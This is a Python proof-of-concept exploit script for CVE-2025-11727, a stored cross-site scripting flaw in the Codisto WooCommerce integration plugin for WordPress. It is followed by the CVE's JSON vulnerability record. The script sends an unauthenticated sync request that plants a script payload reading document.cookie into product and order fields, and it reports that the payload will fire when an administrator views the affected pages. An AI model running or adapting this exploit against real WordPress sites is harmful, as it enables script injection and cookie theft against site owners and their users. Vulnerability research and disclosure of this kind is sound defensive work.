CVE-2025-11727

import requests import json # CVE-2025-11727 Stored XSS in Codisto WordPress Plugin # Target: WordPress site with Codisto plugin <= 1.3.65 TARGET_URL = "http://target-wordpress-site.com" # The sync endpoint where the plugin receives data from e-commerce platforms SYNC_ENDPOINT = f"{TARGET_URL}/wp-content/plugins/codistoconnect/connect.php" # Malicious XSS payload XSS_PAYLOAD = '<script>alert(document.cookie)</script>' def exploit_cve_2025_11727(): """ Exploit for CVE-2025-11727: Stored XSS in Codisto sync() function Attack vector: Send malicious payload through the sync function """ headers = { 'Content-Type': 'application/json', 'User-Agent': 'Mozilla/5.0 (Codisto Sync Client)' } # Construct malicious sync request # The payload is injected into product data fields exploit_data = { 'action': 'sync', 'channel': 'amazon', 'products': [ { 'sku': 'PROD-001', 'name': f'Product Name{XSS_PAYLOAD}', 'description': f'Description with{XSS_PAYLOAD}', 'price': '99.99' } ], 'orders': [ { 'order_id': 'ORD-12345', 'customer_name': f'Customer{XSS_PAYLOAD}', 'total': '150.00' } ] } try: response = requests.post( SYNC_ENDPOINT, headers=headers, json=exploit_data, timeout=30 ) print(f"[*] Response Status: {response.status_code}") if response.status_code == 200: print("[+] Payload sent successfully") print("[*] XSS payload stored in database") print("[*] Trigger when admin/user accesses affected pages") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") if __name__ == "__main__": print("CVE-2025-11727 Codisto Stored XSS Exploit") exploit_cve_2025_11727()

{"cve": {"id": "CVE-2025-11727", "sourceIdentifier": "[email protected]", "published": "2025-12-04T05:16:23.157", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Omnichannel for WooCommerce: Google, Amazon, eBay & Walmart Integration – Powered by Codisto plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the sync() function in all versions up to, and including, 1.3.65 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/codistoconnect/trunk/connect.php#L2101", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/codistoconnect/trunk/connect.php#L2117", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/codistoconnect/trunk/connect.php#L3063", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/codistoconnect/trunk/connect.php#L3248", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/codistoconnect/trunk/connect.php#L3249", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f4e3b796-af9a-4403-8d9a-1b56d7253b45?source=cve", "source": "[email protected]"}]}}